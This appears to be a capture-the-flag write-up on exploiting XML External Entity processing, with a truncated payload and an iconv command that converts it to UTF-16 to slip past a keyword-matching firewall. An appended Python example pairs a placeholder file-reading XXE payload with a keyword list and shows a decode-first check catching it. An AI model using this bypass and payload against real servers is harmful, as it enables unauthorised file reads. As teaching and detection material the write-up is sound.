Tags: xxe waf-bypass
Rating:
Exploit [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing). This is complicated by the presence of what appears to be a WAF (Web Application Firewall) that blocks keywords an XXE payload needs, such as ENTITY and SYSTEM, among others. Because the WAF matches these keywords as plain UTF-8 byte strings, we bypass it by converting the payload to UTF-16, which the XML parser still accepts.
```
]>
<users><user><intro>&yee;;</intro></user></users>
```
```
$ iconv -f utf-8 -t utf-16be < xxe.xml > xxe-utf-16.xml
```
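Why the bypass works, and how a filter has to look at the document to catch it, as an added example that is not part of the original writeup: a byte-level keyword rule misses the UTF-16BE payload produced by `iconv`, while a check that first decodes the document the way an XML parser would (BOM, then the byte pattern of the first character) flags it. The payload below is constructed to match the shape of the page's `xxe.xml`; the `SYSTEM` URI is a placeholder. Disabling DTD and external-entity resolution in the parser remains the actual fix; this check is only a detection layer.

```python
import codecs

# Constructed sample, same shape as the page's xxe.xml; the SYSTEM URI is a
# placeholder, not a real target.
XXE_UTF8 = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE users [ <!ENTITY yee SYSTEM "file:///PLACEHOLDER"> ]>\n'
    b'<users><user><intro>&yee;</intro></user></users>\n'
)
# What `iconv -f utf-8 -t utf-16be < xxe.xml` produces: big-endian, no BOM.
XXE_UTF16BE = XXE_UTF8.decode("utf-8").encode("utf-16-be")

KEYWORDS = ("<!DOCTYPE", "<!ENTITY", "SYSTEM", "PUBLIC")


def naive_waf_flags(raw: bytes) -> bool:
    """Keyword match on raw bytes, as a naive WAF rule does.

    In UTF-16 every ASCII letter is followed by a NUL byte, so the contiguous
    byte string b"SYSTEM" never occurs and the rule silently passes it."""
    return any(k.encode("ascii") in raw for k in KEYWORDS)


def sniff_encoding(raw: bytes) -> str:
    """Pick the encoding an XML parser would use: a BOM wins, otherwise the
    NUL-byte pattern of the first character. XML documents start with '<'
    (or whitespace), so '\\x00<' means UTF-16BE and '<\\x00' means UTF-16LE.
    This also covers a payload with no <?xml ...?> declaration at all."""
    if raw.startswith(codecs.BOM_UTF8):
        return "utf-8-sig"
    if raw.startswith((codecs.BOM_UTF16_BE, codecs.BOM_UTF16_LE)):
        return "utf-16"          # Python's utf-16 codec honours and strips the BOM
    if raw[:2] == b"\x00<":
        return "utf-16-be"
    if raw[:2] == b"<\x00":
        return "utf-16-le"
    return "utf-8"


def normalized_waf_flags(raw: bytes) -> bool:
    """Decode first, then match: sees the same text the XML parser will."""
    text = raw.decode(sniff_encoding(raw), errors="replace")
    return any(k in text for k in KEYWORDS)


if __name__ == "__main__":
    for label, doc in (("utf-8", XXE_UTF8), ("utf-16be", XXE_UTF16BE)):
        print(f"{label:8s} naive={naive_waf_flags(doc)} "
              f"normalized={normalized_waf_flags(doc)}")
```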
[More details](https://blog.vero.site/post/unagi)